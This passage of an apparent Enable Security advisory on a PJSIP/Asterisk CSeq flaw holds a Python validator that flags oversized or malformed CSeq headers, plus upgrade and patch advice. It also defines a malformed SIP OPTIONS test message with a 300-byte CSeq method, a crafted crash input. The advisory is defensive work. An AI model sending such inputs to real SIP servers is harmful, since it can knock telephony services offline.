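    "Via: SIP/2.0/UDP 195.37.78.177:5060\r\n"
    "Contact: <sip:test@localhost>\r\n"
    "Content-Length: 0\r\n\r\n"
)
BENIGN_OPTIONS = MALFORMED_OPTIONS.replace("CSeq: 0 " + "A" * 300, "CSeq: 1 OPTIONS")

# RFC 3261: CSeq = 1*DIGIT LWS Method, where Method is a token.
CSEQ_RE = re.compile(r"^(\d+)\s+([A-Za-z0-9\-.!%*_+`'~]+)$")
# Assumed policy limit on the method token; real SIP methods are short.
MAX_METHOD_LEN = 32

def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a SIP message into (name, value) pairs, unfolding continuation lines."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]  # drop the request line
    unfolded: List[str] = []
    for line in lines:
        if line[:1] in (" ", "\t") and unfolded:
            unfolded[-1] += " " + line.strip()  # folded header continuation
        else:
            unfolded.append(line)
    headers = []
    for line in unfolded:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers

def check_cseq(raw: str, max_method_len: int = MAX_METHOD_LEN) -> List[str]:
    """Return findings for a CSeq header that is missing, malformed or oversized."""
    findings = []
    cseqs = [v for n, v in parse_headers(raw) if n == "cseq"]
    if len(cseqs) != 1:
        findings.append(f"expected exactly one CSeq header, found {len(cseqs)}")
    for value in cseqs:
        m = CSEQ_RE.match(value)
        if not m:
            findings.append("CSeq does not match '1*DIGIT LWS Method'")
            continue
        if int(m.group(1)) > 2**31 - 1:  # RFC 3261 requires the number to fit in 31 bits
            findings.append("CSeq sequence number exceeds 2**31-1")
        if len(m.group(2)) > max_method_len:
            findings.append(f"CSeq method token is {len(m.group(2))} bytes")
    return findings
```

An empty list from `check_cseq` means the request passed; a non-empty list is the reason to drop or alert on it before it reaches the SIP stack.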

## Solutions and recommendations

Apply the fix issued by Asterisk: upgrade to Asterisk 13.15.1, 14.4.1 or 13.13-cert4.

If you use PJSIP directly, apply the patch in revision 5593. See <https://trac.pjsip.org/repos/ticket/2016>.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) provides Information
Security services, including Penetration Testing, Research and
Development, to help protect client networks and applications against
online attackers.

## Disclaimer

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author
nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.